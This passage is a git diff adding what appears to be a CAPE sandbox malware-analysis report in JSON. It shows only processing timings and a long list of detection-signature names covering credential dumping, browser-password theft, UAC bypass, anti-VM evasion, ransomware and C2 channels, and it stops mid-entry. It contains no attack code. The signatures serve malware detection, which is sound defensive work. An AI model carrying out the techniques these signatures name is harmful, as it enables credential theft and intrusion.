diff --git "a/26e9b8b488a0e7a70b14149c3da88bb5.json" "b/26e9b8b488a0e7a70b14149c3da88bb5.json" new file mode 100644--- /dev/null +++ "b/26e9b8b488a0e7a70b14149c3da88bb5.json" @@ -0,0 +1,100218 @@ +{ + "statistics": { + "processing": [ + { + "name": "CAPE", + "time": 4.097 + }, + { + "name": "AnalysisInfo", + "time": 0.012 + }, + { + "name": "BehaviorAnalysis", + "time": 0.068 + }, + { + "name": "Debug", + "time": 0.001 + }, + { + "name": "NetworkAnalysis", + "time": 0.0 + }, + { + "name": "Suricata", + "time": 0.0 + }, + { + "name": "UrlAnalysis", + "time": 0.0 + }, + { + "name": "script_log_processing", + "time": 0.0 + }, + { + "name": "ProcessMemory", + "time": 0.0 + } + ], + "signatures": [ + { + "name": "packer_themida", + "time": 0.0 + }, + { + "name": "stealth_network", + "time": 0.0 + }, + { + "name": "disable_driver_via_blocklist", + "time": 0.0 + }, + { + "name": "disable_driver_via_hvcidisallowedimages", + "time": 0.0 + }, + { + "name": "disable_hypervisor_protected_code_integrity", + "time": 0.0 + }, + { + "name": "pendingfilerenameoperations_Operations", + "time": 0.0 + }, + { + "name": "anomalous_deletefile", + "time": 0.0 + }, + { + "name": "antiav_360_libs", + "time": 0.0 + }, + { + "name": "antiav_ahnlab_libs", + "time": 0.0 + }, + { + "name": "antiav_avast_libs", + "time": 0.0 + }, + { + "name": "antiav_bitdefender_libs", + "time": 0.0 + }, + { + "name": "antiav_bullgaurd_libs", + "time": 0.0 + }, + { + "name": "antiav_emsisoft_libs", + "time": 0.0 + }, + { + "name": "antiav_qurb_libs", + "time": 0.0 + }, + { + "name": "antiav_servicestop", + "time": 0.0 + }, + { + "name": "antiav_apioverride_libs", + "time": 0.0 + }, + { + "name": "antidebug_guardpages", + "time": 0.0 + }, + { + "name": "antidebug_ntcreatethreadex", + "time": 0.0 + }, + { + "name": "antiav_nthookengine_libs", + "time": 0.0 + }, + { + "name": "antidebug_outputdebugstring", + "time": 0.0 + }, + { + "name": "antidebug_setunhandledexceptionfilter", + "time": 0.0 + }, + { + "name": "antidebug_windows", + "time": 0.0 + }, + { + "name": "antisandbox_cuckoo", + "time": 0.0 + }, + { + "name": "antisandbox_cuckoocrash", + "time": 0.0 + }, + { + "name": "antisandbox_foregroundwindows", + "time": 0.0 + }, + { + "name": "antisandbox_mouse_hook", + "time": 0.0 + }, + { + "name": "antisandbox_sboxie_libs", + "time": 0.0 + }, + { + "name": "antisandbox_sboxie_objects", + "time": 0.0 + }, + { + "name": "antisandbox_script_timer", + "time": 0.0 + }, + { + "name": "antisandbox_sleep", + "time": 0.0 + }, + { + "name": "antisandbox_sunbelt_libs", + "time": 0.0 + }, + { + "name": "antisandbox_unhook", + "time": 0.0 + }, + { + "name": "antivm_directory_objects", + "time": 0.0 + }, + { + "name": "antivm_generic_disk", + "time": 0.0 + }, + { + "name": "antivm_generic_system", + "time": 0.0 + }, + { + "name": "antivm_checks_available_memory", + "time": 0.0 + }, + { + "name": "detect_virtualization_via_recent_files", + "time": 0.0 + }, + { + "name": "antivm_vbox_libs", + "time": 0.0 + }, + { + "name": "antivm_vmware_events", + "time": 0.0 + }, + { + "name": "antivm_vmware_libs", + "time": 0.0 + }, + { + "name": "api_spamming", + "time": 0.0 + }, + { + "name": "api_uuidfromstringa", + "time": 0.0 + }, + { + "name": "bcdedit_command", + "time": 0.0 + }, + { + "name": "bootkit", + "time": 0.0 + }, + { + "name": "potential_overwrite_mbr", + "time": 0.0 + }, + { + "name": "suspicious_ioctl_scsipassthough", + "time": 0.0 + }, + { + "name": "browser_needed", + "time": 0.0 + }, + { + "name": "firefox_disables_process_tab", + "time": 0.0 + }, + { + "name": "regsvr32_squiblydoo_dll_load", + "time": 0.0 + }, + { + "name": "uac_bypass_cmstp", + "time": 0.0 + }, + { + "name": "uac_bypass_eventvwr", + "time": 0.0 + }, + { + "name": "uac_bypass_windows_Backup", + "time": 0.0 + }, + { + "name": "dotnet_code_compile", + "time": 0.0 + }, + { + "name": "creates_largekey", + "time": 0.0 + }, + { + "name": "creates_nullvalue", + "time": 0.0 + }, + { + "name": "access_windows_passwords_vault", + "time": 0.0 + }, + { + "name": "dump_lsa_via_windows_error_reporting", + "time": 0.0 + }, + { + "name": "lsass_credential_dumping", + "time": 0.0 + }, + { + "name": "critical_process", + "time": 0.0 + }, + { + "name": "cryptopool_domains", + "time": 0.0 + }, + { + "name": "dead_connect", + "time": 0.0 + }, + { + "name": "dead_link", + "time": 0.0 + }, + { + "name": "decoy_document", + "time": 0.0 + }, + { + "name": "decoy_image", + "time": 0.0 + }, + { + "name": "deletes_consolehost_history", + "time": 0.0 + }, + { + "name": "dep_bypass", + "time": 0.0 + }, + { + "name": "dep_disable", + "time": 0.0 + }, + { + "name": "disables_spdy", + "time": 0.0 + }, + { + "name": "disables_wfp", + "time": 0.0 + }, + { + "name": "add_windows_defender_exclusions", + "time": 0.0 + }, + { + "name": "dll_load_uncommon_file_types", + "time": 0.0 + }, + { + "name": "document_script_exe_drop", + "time": 0.0 + }, + { + "name": "guloader_apis", + "time": 0.0 + }, + { + "name": "driver_load", + "time": 0.0 + }, + { + "name": "dynamic_function_loading", + "time": 0.0 + }, + { + "name": "encrypted_ioc", + "time": 0.0 + }, + { + "name": "exec_crash", + "time": 0.0 + }, + { + "name": "process_creation_suspicious_location", + "time": 0.0 + }, + { + "name": "exploit_getbasekerneladdress", + "time": 0.0 + }, + { + "name": "exploit_gethaldispatchtable", + "time": 0.0 + }, + { + "name": "exploit_heapspray", + "time": 0.0 + }, + { + "name": "koadic_apis", + "time": 0.0 + }, + { + "name": "koadic_network_activity", + "time": 0.0 + }, + { + "name": "downloads_from_filehosting", + "time": 0.0 + }, + { + "name": "generic_phish", + "time": 0.0 + }, + { + "name": "http_request", + "time": 0.0 + }, + { + "name": "infostealer_browser", + "time": 0.0 + }, + { + "name": "infostealer_browser_password", + "time": 0.0 + }, + { + "name": "infostealer_cookies", + "time": 0.0 + }, + { + "name": "cryptbot_network", + "time": 0.0 + }, + { + "name": "infostealer_keylog", + "time": 0.0 + }, + { + "name": "masslogger_version", + "time": 0.0 + }, + { + "name": "purplewave_network_activity", + "time": 0.0 + }, + { + "name": "quilclipper_behavior", + "time": 0.0 + }, + { + "name": "raccoon_behavior", + "time": 0.0 + }, + { + "name": "captures_screenshot", + "time": 0.0 + }, + { + "name": "vidar_behavior", + "time": 0.0 + }, + { + "name": "injection_createremotethread", + "time": 0.0 + }, + { + "name": "injection_explorer", + "time": 0.0 + }, + { + "name": "injection_network_traffic", + "time": 0.0 + }, + { + "name": "injection_runpe", + "time": 0.0 + }, + { + "name": "injection_rwx", + "time": 0.0 + }, + { + "name": "injection_themeinitapihook", + "time": 0.0 + }, + { + "name": "resumethread_remote_process", + "time": 0.0 + }, + { + "name": "internet_dropper", + "time": 0.0 + }, + { + "name": "escalate_privilege_via_named_pipe", + "time": 0.0 + }, + { + "name": "ipc_namedpipe", + "time": 0.0 + }, + { + "name": "js_phish", + "time": 0.0 + }, + { + "name": "js_suspicious_redirect", + "time": 0.0 + }, + { + "name": "execute_binary_via_internet_explorer_exporter", + "time": 0.0 + }, + { + "name": "execute_binary_via_run_exe_helper_utility", + "time": 0.0 + }, + { + "name": "execute_ps_via_syncappvpublishingserver", + "time": 0.0 + }, + { + "name": "malicious_dynamic_function_loading", + "time": 0.0 + }, + { + "name": "encrypt_pcinfo", + "time": 0.0 + }, + { + "name": "encrypt_data_agenttesla_http", + "time": 0.0 + }, + { + "name": "encrypt_data_agentteslat2_http", + "time": 0.0 + }, + { + "name": "encrypt_data_nanocore", + "time": 0.0 + }, + { + "name": "mimics_filetime", + "time": 0.0 + }, + { + "name": "amsi_bypass_via_com_registry", + "time": 0.0 + }, + { + "name": "access_auto_logons_via_registry", + "time": 0.0 + }, + { + "name": "access_boot_key_via_registry", + "time": 0.0 + }, + { + "name": "create_suspicious_lnk_files", + "time": 0.0 + }, + { + "name": "credential_access_via_windows_credential_history", + "time": 0.0 + }, + { + "name": "dll_hijacking_via_microsoft_exchange", + "time": 0.0 + }, + { + "name": "dll_hijacking_via_waas_medic_svc_com_typelib", + "time": 0.0 + }, + { + "name": "execute_file_downloaded_via_openssh", + "time": 0.0 + }, + { + "name": "execute_safe_mode_from_suspicious_process", + "time": 0.0 + }, + { + "name": "execute_scripts_via_microsoft_management_console", + "time": 0.0 + }, + { + "name": "execute_suspicious_processes_via_windows_mssql_service", + "time": 0.0 + }, + { + "name": "execution_from_self_extracting_archive", + "time": 0.0 + }, + { + "name": "ip_address_discovery_via_trusted_program", + "time": 0.0 + }, + { + "name": "load_dll_via_control_panel", + "time": 0.0 + }, + { + "name": "network_connection_via_suspicious_process", + "time": 0.0 + }, + { + "name": "potential_location_discovery_via_unusual_process", + "time": 0.0 + }, + { + "name": "store_executable_registry", + "time": 0.0 + }, + { + "name": "Suspicious_Execution_Via_MicrosoftExchangeTransportAgent", + "time": 0.0 + }, + { + "name": "suspicious_java_execution_via_win_scripts", + "time": 0.0 + }, + { + "name": "Suspicious_Scheduled_Task_Creation_Via_Masqueraded_XML_File", + "time": 0.0 + }, + { + "name": "uses_restart_manager_for_suspicious_activities", + "time": 0.0 + }, + { + "name": "modify_desktop_wallpaper", + "time": 0.0 + }, + { + "name": "modify_zoneid_ads", + "time": 0.0 + }, + { + "name": "move_file_on_reboot", + "time": 0.0 + }, + { + "name": "multiple_useragents", + "time": 0.0 + }, + { + "name": "network_anomaly", + "time": 0.0 + }, + { + "name": "network_bind", + "time": 0.0 + }, + { + "name": "network_cnc_https_archive", + "time": 0.0 + }, + { + "name": "network_cnc_https_free_webshoting", + "time": 0.0 + }, + { + "name": "network_cnc_https_generic", + "time": 0.0 + }, + { + "name": "network_cnc_https_temp_urldns", + "time": 0.0 + }, + { + "name": "network_cnc_https_opensource", + "time": 0.0 + }, + { + "name": "network_cnc_https_pastesite", + "time": 0.0 + }, + { + "name": "network_cnc_https_payload", + "time": 0.0 + }, + { + "name": "network_cnc_https_serviceinterface", + "time": 0.0 + }, + { + "name": "network_cnc_https_socialmedia", + "time": 0.0 + }, + { + "name": "network_cnc_https_telegram", + "time": 0.0 + }, + { + "name": "network_cnc_https_tempstorage", + "time": 0.0 + }, + { + "name": "network_cnc_https_urlshortener", + "time": 0.0 + }, + { + "name": "network_cnc_https_useragent", + "time": 0.0 + }, + { + "name": "network_cnc_smtps_exfil", + "time": 0.0 + }, + { + "name": "network_cnc_smtps_generic", + "time": 0.0 + }, + { + "name": "network_dns_idn", + "time": 0.0 + }, + { + "name": "network_dns_suspicious_querytype", + "time": 0.0 + }, + { + "name": "network_dns_tunneling_request", + "time": 0.0 + }, + { + "name": "network_document_http", + "time": 0.0 + }, + { + "name": "explorer_http", + "time": 0.0 + }, + { + "name": "network_fake_useragent", + "time": 0.0 + }, + { + "name": "legitimate_domain_abuse", + "time": 0.0 + }, + { + "name": "network_document_file", + "time": 0.0 + }, + { + "name": "network_tor", + "time": 0.0 + }, + { + "name": "office_com_load", + "time": 0.0 + }, + { + "name": "office_dotnet_load", + "time": 0.0 + }, + { + "name": "office_mshtml_load", + "time": 0.0 + }, + { + "name": "office_vb_load", + "time": 0.0 + }, + { + "name": "office_wmi_load", + "time": 0.0 + }, + { + "name": "office_cve2017_11882", + "time": 0.0 + }, + { + "name": "office_cve2017_11882_network", + "time": 0.0 + }, + { + "name": "office_cve_2021_40444", + "time": 0.0 + }, + { + "name": "office_cve_2021_40444_m2", + "time": 0.0 + }, + { + "name": "office_flash_load", + "time": 0.0 + }, + { + "name": "office_postscript", + "time": 0.0 + }, + { + "name": "office_suspicious_processes", + "time": 0.0 + }, + { + "name": "office_write_exe", + "time": 0.0 + }, + { + "name": "persistence_via_autodial_dll_registry", + "time": 0.0 + }, + { + "name": "persistence_autorun", + "time": 0.0 + }, + { + "name": "persistence_autorun_tasks", + "time": 0.0 + }, + { + "name": "persistence_bootexecute", + "time": 0.0 + }, + { + "name": "persistence_registry_script", + "time": 0.0 + }, + { + "name": "powershell_network_connection", + "time": 0.0 + }, + { + "name": "powershell_download", + "time": 0.0 + }, + { + "name": "powershell_request", + "time": 0.0 + }, + { + "name": "createtoolhelp32snapshot_module_enumeration", + "time": 0.0 + }, + { + "name": "enumerates_running_processes", + "time": 0.0 + }, + { + "name": "process_interest", + "time": 0.0 + }, + { + "name": "process_needed", + "time": 0.0 + }, + { + "name": "mass_data_encryption", + "time": 0.0 + }, + { + "name": "ransomware_file_modifications", + "time": 0.0 + }, + { + "name": "ransomware_message", + "time": 0.0 + }, + { + "name": "nemty_network_activity", + "time": 0.0 + }, + { + "name": "nemty_note", + "time": 0.0 + }, + { + "name": "sodinokibi_behavior", + "time": 0.0 + }, + { + "name": "stop_ransomware_registry", + "time": 0.0 + }, + { + "name": "blackrat_apis", + "time": 0.0 + }, + { + "name": "blackrat_network_activity", + "time": 0.0 + }, + { + "name": "blackrat_registry_keys", + "time": 0.0 + }, + { + "name": "dcrat_behavior", + "time": 0.0 + }, + { + "name": "karagany_system_event_objects", + "time": 0.0 + }, + { + "name": "rat_luminosity", + "time": 0.0 + }, + { + "name": "rat_nanocore", + "time": 0.0 + }, + { + "name": "netwire_behavior", + "time": 0.0 + }, + { + "name": "obliquerat_network_activity", + "time": 0.0 + }, + { + "name": "orcusrat_behavior", + "time": 0.0 + }, + { + "name": "trochilusrat_apis", + "time": 0.0 + }, + { + "name": "reads_self", + "time": 0.0 + }, + { + "name": "recon_beacon", + "time": 0.0 + }, + { + "name": "recon_programs", + "time": 0.0 + }, + { + "name": "recon_systeminfo", + "time": 0.0 + }, + { + "name": "accesses_recyclebin", + "time": 0.0 + }, + { + "name": "remcos_shell_code_dynamic_wrapper_x", + "time": 0.0 + }, + { + "name": "script_created_process", + "time": 0.0 + }, + { + "name": "script_network_activity", + "time": 0.0 + }, + { + "name": "suspicious_js_script", + "time": 0.0 + }, + { + "name": "javascript_timer", + "time": 0.0 + }, + { + "name": "secure_login_phishing", + "time": 0.0 + }, + { + "name": "securityxploded_modules", + "time": 0.0 + }, + { + "name": "get_clipboard_data", + "time": 0.0 + }, + { + "name": "sets_autoconfig_url", + "time": 0.0 + }, + { + "name": "spoofs_procname", + "time": 0.0 + }, + { + "name": "stack_pivot", + "time": 0.0 + }, + { + "name": "stack_pivot_file_created", + "time": 0.0 + }, + { + "name": "stack_pivot_process_create", + "time": 0.0 + }, + { + "name": "set_clipboard_data", + "time": 0.0 + }, + { + "name": "stealth_childproc", + "time": 0.0 + }, + { + "name": "stealth_file", + "time": 0.0 + }, + { + "name": "stealth_timeout", + "time": 0.0 + }, + { + "name": "stealth_window", + "time": 0.0 + }, + { + "name": "queries_keyboard_layout", + "time": 0.0 + }, + { + "name": "terminates_remote_process", + "time": 0.0 + }, + { + "name": "user_enum", + "time": 0.0 + }, + { + "name": "virus", + "time": 0.0 + }, + { + "name": "neshta_files", + "time": 0.0 + }, + { + "name": "neshta_regkeys", + "time": 0.0 + }, + { + "name": "webmail_phish", + "time": 0.0 + }, + { + "name": "persists_dev_util", + "time": 0.0 + }, + { + "name": "spawns_dev_util", + "time": 0.0 + }, + { + "name": "alters_windows_utility", + "time": 0.0 + }, + { + "name": "overwrites_accessibility_utility", + "time": 0.0 + }, + { + "name": "Potential_Lateral_Movement_Via_SMBEXEC", + "time": 0.0 + }, + { + "name": "potential_WebShell_Via_ScreenConnectServer", + "time": 0.0 + }, + { + "name": "uses_Microsoft_HTML_Help_Executable", + "time": 0.0 + }, + { + "name": "wiper_zeroedbytes", + "time": 0.0 + }, + { + "name": "wmi_create_process", + "time": 0.0 + }, + { + "name": "wmi_script_process", + "time": 0.0 + }, + { + "name": "deletes_files", + "time": 0.0 + }, + { + "name": "drops_files", + "time": 0.0 + }, + { + "name": "reads_files", + "time": 0.0 + }, + { + "name": "writes_files", + "time": 0.0 + }, + { + "name": "antianalysis_tls_section", + "time": 0.0 + }, + { + "name": "antivirus_clamav", + "time": 0.0 + }, + { + "name": "antivirus_virustotal", + "time": 0.0 + }, + { + "name": "bad_certs", + "time": 0.0 + }, + { + "name": "bad_ssl_certs", + "time": 0.0 + }, + { + "name": "banker_zeus_p2p", + "time": 0.0 + }, + { + "name": "banker_zeus_url", + "time": 0.0 + }, + { + "name": "binary_yara", + "time": 0.0 + }, + { + "name": "bot_athenahttp", + "time": 0.0 + }, + { + "name": "bot_dirtjumper", + "time": 0.0 + }, + { + "name": "bot_drive", + "time": 0.0 + }, + { + "name": "bot_drive2", + "time": 0.0 + }, + { + "name": "bot_madness", + "time": 0.0 + }, + { + "name": "family_proxyback", + "time": 0.0 + }, + { + "name": "flare_capa_antianalysis", + "time": 0.0 + }, + { + "name": "flare_capa_collection", + "time": 0.0 + }, + { + "name": "flare_capa_communication", + "time": 0.0 + }, + { + "name": "flare_capa_compiler", + "time": 0.0 + }, + { + "name": "flare_capa_datamanipulation", + "time": 0.0 + }, + { + "name": "flare_capa_executable", + "time": 0.0 + }, + { + "name": "flare_capa_hostinteraction", + "time": 0.0 + }, + { + "name": "flare_capa_impact", + "time": 0.0 + }, + { + "name": "flare_capa_lib", + "time": 0.0 + }, + { + "name": "flare_capa_linking", + "time": 0.0 + }, + { + "name": "flare_capa_loadcode", + "time": 0.0 + }, + { + "name": "flare_capa_malwarefamily", + "time": 0.0 + }, + { + "name": "flare_capa_nursery", + "time": 0.0 + }, + { + "name": "flare_capa_persistence", + "time": 0.0 + }, + { + "name": "flare_capa_runtime", + "time": 0.0 + }, + { + "name": "flare_capa_targeting", + "time": 0.0 + }, + { + "name": "log4shell", + "time": 0.0 + }, + { + "name": "mimics_extension", + "time": 0.0 + }, + { + "name": "network_country_distribution", + "time": 0.0 + }, + { + "name": "network_cnc_http", + "time": 0.0 + }, + { + "name": "network_ip_exe", + "time": 0.0 + }, + { + "name": "network_dga", + "time": 0.0 + }, + { + "name": "network_dga_fraunhofer", + "time": 0.0 + }, + { + "name": "network_dyndns", + "time": 0.0 + }, + { + "name": "network_excessive_udp", + "time": 0.0 + }, + { + "name": "network_http", + "time": 0.0 + }, + { + "name": "network_icmp", + "time": 0.0 + }, + { + "name": "network_irc", + "time": 0.0 + }, + { + "name": "network_open_proxy", + "time": 0.0 + }, + { + "name": "network_questionable_http_path", + "time": 0.0 + }, + { + "name": "network_questionable_https_path", + "time": 0.0 + }, + { + "name": "network_smtp", + "time": 0.0 + }, + { + "name": "network_torgateway", + "time": 0.0 + }, + { + "name": "origin_langid", + "time": 0.0 + }, + { + "name": "origin_resource_langid", + "time": 0.0 + }, + { + "name": "overlay", + "time": 0.0 + }, + { + "name": "packer_unknown_pe_section_name", + "time": 0.0 + }, + { + "name": "packer_aspack", + "time": 0.0 + }, + { + "name": "packer_aspirecrypt", + "time": 0.0 + }, + { + "name": "packer_bedsprotector", + "time": 0.0 + }, + { + "name": "packer_confuser", + "time": 0.0 + }, + { + "name": "packer_enigma", + "time": 0.0 + }, + { + "name": "packer_entropy", + "time": 0.0 + }, + { + "name": "packer_mpress", + "time": 0.0 + }, + { + "name": "packer_nate", + "time": 0.0 + }, + { + "name": "packer_nspack", + "time": 0.0 + }, + { + "name": "packer_smartassembly", + "time": 0.0 + }, + { + "name": "packer_spices", + "time": 0.0 + }, + { + "name": "packer_themida", + "time": 0.0 + }, + { + "name": "packer_titan", + "time": 0.0 + }, + { + "name": "packer_upx", + "time": 0.0 + }, + { + "name": "packer_vmprotect", + "time": 0.0 + }, + { + "name": "packer_yoda", + "time": 0.0 + }, + { + "name": "pdf_annot_urls_checker", + "time": 0.0 + }, + { + "name": "polymorphic", + "time": 0.0 + }, + { + "name": "punch_plus_plus_pcres", + "time": 0.0 + }, + { + "name": "procmem_yara", + "time": 0.0 + }, + { + "name": "recon_checkip", + "time": 0.0 + }, + { + "name": "static_authenticode", + "time": 0.0 + }, + { + "name": "invalid_authenticode_signature", + "time": 0.0 + }, + { + "name": "static_dotnet_anomaly", + "time": 0.0 + }, + { + "name": "static_java", + "time": 0.0 + }, + { + "name": "static_pdf", + "time": 0.0 + }, + { + "name": "static_pe_anomaly", + "time": 0.0 + }, + { + "name": "pe_compile_timestomping", + "time": 0.0 + }, + { + "name": "static_pe_pdbpath", + "time": 0.0 + }, + { + "name": "static_rat_config", + "time": 0.0 + }, + { + "name": "static_versioninfo_anomaly", + "time": 0.0 + }, + { + "name": "suricata_alert", + "time": 0.0 + }, + { + "name": "suspicious_html_body", + "time": 0.0 + }, + { + "name": "suspicious_html_name", + "time": 0.0 + }, + { + "name": "suspicious_html_title", + "time": 0.0 + }, + { + "name": "volatility_devicetree_1", + "time": 0.0 + }, + { + "name": "volatility_handles_1", + "time": 0.0 + }, + { + "name": "volatility_ldrmodules_1", + "time": 0.0 + }, + { + "name": "volatility_ldrmodules_2", + "time": 0.0 + }, + { + "name": "volatility_malfind_1", + "time": 0.0 + }, + { + "name": "volatility_malfind_2", + "time": 0.0 + }, + { + "name": "volatility_modscan_1", + "time": 0.0 + }, + { + "name": "volatility_svcscan_1", + "time": 0.0 + }, + { + "name": "volatility_svcscan_2", + "time": 0.0 + }, + { + "name": "volatility_svcscan_3", + "time": 0.0 + }, + { + "name": "whois_create", + "time": 0.0 + }, + { + "name": "accesses_mailslot", + "time": 0.0 + }, + { + "name": "accesses_netlogon_regkey", + "time": 0.0 + }, + { + "name": "accesses_public_folder", + "time": 0.0 + }, + { + "name": "accesses_sysvol", + "time": 0.0 + }, + { + "name": "writes_sysvol", + "time": 0.0 + }, + { + "name": "adds_admin_user", + "time": 0.0 + }, + { + "name": "adds_user", + "time": 0.0 + }, + { + "name": "overwrites_admin_password", + "time": 0.0 + }, + { + "name": "antianalysis_detectfile", + "time": 0.001 + }, + { + "name": "antianalysis_detectreg", + "time": 0.01 + }, + { + "name": "modify_attachment_manager", + "time": 0.0 + }, + { + "name": "antiav_detectfile", + "time": 0.001 + }, + { + "name": "antiav_detectreg", + "time": 0.049 + }, + { + "name": "antiav_srp", + "time": 0.0 + }, + { + "name": "antiav_whitespace", + "time": 0.0 + }, + { + "name": "antidebug_devices", + "time": 0.0 + }, + { + "name": "antiemu_windefend", + "time": 0.0 + }, + { + "name": "antiemu_wine_reg", + "time": 0.0 + }, + { + "name": "antisandbox_cuckoo_files", + "time": 0.0 + }, + { + "name": "antisandbox_fortinet_files", + "time": 0.0 + }, + { + "name": "antisandbox_joe_anubis_files", + "time": 0.0 + }, + { + "name": "antisandbox_sboxie_mutex", + "time": 0.0 + }, + { + "name": "antisandbox_sunbelt_files", + "time": 0.0 + }, + { + "name": "antisandbox_threattrack_files", + "time": 0.0 + }, + { + "name": "antivm_bochs_keys", + "time": 0.001 + }, + { + "name": "antivm_generic_bios", + "time": 0.001 + }, + { + "name": "antivm_generic_diskreg", + "time": 0.002 + }, + { + "name": "antivm_hyperv_keys", + "time": 0.001 + }, + { + "name": "antivm_parallels_keys", + "time": 0.003 + }, + { + "name": "antivm_vbox_devices", + "time": 0.0 + }, + { + "name": "antivm_vbox_files", + "time": 0.0 + }, + { + "name": "antivm_vbox_keys", + "time": 0.006 + }, + { + "name": "antivm_vmware_devices", + "time": 0.0 + }, + { + "name": "antivm_vmware_files", + "time": 0.0 + }, + { + "name": "antivm_vmware_keys", + "time": 0.004 + }, + { + "name": "antivm_vmware_mutexes", + "time": 0.0 + }, + { + "name": "antivm_vpc_files", + "time": 0.0 + }, + { + "name": "antivm_vpc_keys", + "time": 0.002 + }, + { + "name": "antivm_vpc_mutex", + "time": 0.0 + }, + { + "name": "antivm_xen_keys", + "time": 0.003 + }, + { + "name": "asyncrat_mutex", + "time": 0.0 + }, + { + "name": "gulpix_behavior", + "time": 0.0 + }, + { + "name": "ketrican_regkeys", + "time": 0.001 + }, + { + "name": "okrum_mutexes", + "time": 0.0 + }, + { + "name": "banker_cridex", + "time": 0.0 + }, + { + "name": "geodo_banking_trojan", + "time": 0.001 + }, + { + "name": "banker_spyeye_mutexes", + "time": 0.0 + }, + { + "name": "banker_zeus_mutex", + "time": 0.0 + }, + { + "name": "bitcoin_opencl", + "time": 0.0 + }, + { + "name": "accesses_primary_patition", + "time": 0.0 + }, + { + "name": "direct_hdd_access", + "time": 0.0 + }, + { + "name": "enumerates_physical_drives", + "time": 0.0 + }, + { + "name": "physical_drive_access", + "time": 0.0 + }, + { + "name": "bot_russkill", + "time": 0.0 + }, + { + "name": "browser_addon", + "time": 0.0 + }, + { + "name": "chromium_browser_extension_directory", + "time": 0.0 + }, + { + "name": "browser_helper_object", + "time": 0.0 + }, + { + "name": "browser_security", + "time": 0.0 + }, + { + "name": "browser_startpage", + "time": 0.0 + }, + { + "name": "ie_disables_process_tab", + "time": 0.0 + }, + { + "name": "odbcconf_bypass", + "time": 0.0 + }, + { + "name": "squiblydoo_bypass", + "time": 0.0 + }, + { + "name": "squiblytwo_bypass", + "time": 0.0 + }, + { + "name": "bypass_firewall", + "time": 0.001 + }, + { + "name": "checks_uac_status", + "time": 0.0 + }, + { + "name": "uac_bypass_cmstpcom", + "time": 0.0 + }, + { + "name": "uac_bypass_delegateexecute_sdclt", + "time": 0.0 + }, + { + "name": "uac_bypass_fodhelper", + "time": 0.0 + }, + { + "name": "cape_extracted_content", + "time": 0.0 + }, + { + "name": "carberp_mutex", + "time": 0.0 + }, + { + "name": "clears_logs", + "time": 0.0 + }, + { + "name": "cmdline_obfuscation", + "time": 0.0 + }, + { + "name": "cmdline_switches", + "time": 0.0 + }, + { + "name": "cmdline_terminate", + "time": 0.0 + }, + { + "name": "cmdline_forfiles_wildcard", + "time": 0.0 + }, + { + "name": "cmdline_http_link", + "time": 0.0 + }, + { + "name": "cmdline_long_string", + "time": 0.0 + }, + { + "name": "cmdline_reversed_http_link", + "time": 0.0 + }, + { + "name": "long_commandline", + "time": 0.0 + }, + { + "name": "powershell_renamed_commandline", + "time": 0.0 + }, + { + "name": "copies_self", + "time": 0.0 + }, + { + "name": "credwiz_credentialaccess", + "time": 0.0 + }, + { + "name": "enables_wdigest", + "time": 0.0 + }, + { + "name": "vaultcmd_credentialaccess", + "time": 0.0 + }, + { + "name": "file_credential_store_access", + "time": 0.0 + }, + { + "name": "file_credential_store_write", + "time": 0.0 + }, + { + "name": "kerberos_credential_access_via_rubeus", + "time": 0.0 + }, + { + "name": "registry_credential_dumping", + "time": 0.0 + }, + { + "name": "registry_credential_store_access", + "time": 0.0 + }, + { + "name": "registry_lsa_secrets_access", + "time": 0.0 + }, + { + "name": "comsvcs_credentialdump", + "time": 0.0 + }, + { + "name": "cryptomining_stratum_command", + "time": 0.0 + }, + { + "name": "cypherit_mutexes", + "time": 0.0 + }, + { + "name": "darkcomet_regkeys", + "time": 0.0 + }, + { + "name": "datop_loader", + "time": 0.0 + }, + { + "name": "deepfreeze_mutex", + "time": 0.0 + }, + { + "name": "deletes_executed_files", + "time": 0.0 + }, + { + "name": "disables_app_launch", + "time": 0.0 + }, + { + "name": "disables_auto_app_termination", + "time": 0.0 + }, + { + "name": "disables_appv_virtualization", + "time": 0.0 + }, + { + "name": "disables_backups", + "time": 0.0 + }, + { + "name": "disables_browser_warn", + "time": 0.0 + }, + { + "name": "disables_context_menus", + "time": 0.0 + }, + { + "name": "disables_cpl_disable", + "time": 0.0 + }, + { + "name": "disables_crashdumps", + "time": 0.0 + }, + { + "name": "disables_event_logging", + "time": 0.0 + }, + { + "name": "disables_folder_options", + "time": 0.0 + }, + { + "name": "disables_notificationcenter", + "time": 0.0 + }, + { + "name": "disables_power_options", + "time": 0.0 + }, + { + "name": "disables_restore_default_state", + "time": 0.0 + }, + { + "name": "disables_run_command", + "time": 0.0 + }, + { + "name": "disables_smartscreen", + "time": 0.0 + }, + { + "name": "disables_startmenu_search", + "time": 0.0 + }, + { + "name": "disables_system_restore", + "time": 0.0 + }, + { + "name": "disables_uac", + "time": 0.0 + }, + { + "name": "disables_wer", + "time": 0.0 + }, + { + "name": "disables_windows_defender", + "time": 0.0 + }, + { + "name": "disables_windows_defender_logging", + "time": 0.0 + }, + { + "name": "removes_windows_defender_contextmenu", + "time": 0.0 + }, + { + "name": "windows_defender_powershell", + "time": 0.0 + }, + { + "name": "disables_windows_file_protection", + "time": 0.0 + }, + { + "name": "disables_windowsupdate", + "time": 0.0 + }, + { + "name": "disables_winfirewall", + "time": 0.0 + }, + { + "name": "adfind_domain_enumeration", + "time": 0.0 + }, + { + "name": "domain_enumeration_commands", + "time": 0.0 + }, + { + "name": "andromut_mutexes", + "time": 0.0 + }, + { + "name": "downloader_cabby", + "time": 0.0 + }, + { + "name": "phorpiex_mutexes", + "time": 0.0 + }, + { + "name": "protonbot_mutexes", + "time": 0.0 + }, + { + "name": "driver_filtermanager", + "time": 0.0 + }, + { + "name": "dropper", + "time": 0.0 + }, + { + "name": "dll_archive_execution", + "time": 0.0 + }, + { + "name": "lnk_archive_execution", + "time": 0.0 + }, + { + "name": "script_archive_execution", + "time": 0.0 + }, + { + "name": "excel4_macro_urls", + "time": 0.0 + }, + { + "name": "escalate_privilege_via_ntlm_relay", + "time": 0.0 + }, + { + "name": "spooler_access", + "time": 0.0 + }, + { + "name": "spooler_svc_start", + "time": 0.0 + }, + { + "name": "mapped_drives_uac", + "time": 0.0 + }, + { + "name": "hides_recycle_bin_icon", + "time": 0.0 + }, + { + "name": "apocalypse_stealer_file_behavior", + "time": 0.0 + }, + { + "name": "arkei_files", + "time": 0.0 + }, + { + "name": "azorult_mutexes", + "time": 0.0 + }, + { + "name": "infostealer_bitcoin", + "time": 0.001 + }, + { + "name": "cryptbot_files", + "time": 0.0 + }, + { + "name": "echelon_files", + "time": 0.0 + }, + { + "name": "infostealer_ftp", + "time": 0.017 + }, + { + "name": "infostealer_im", + "time": 0.009 + }, + { + "name": 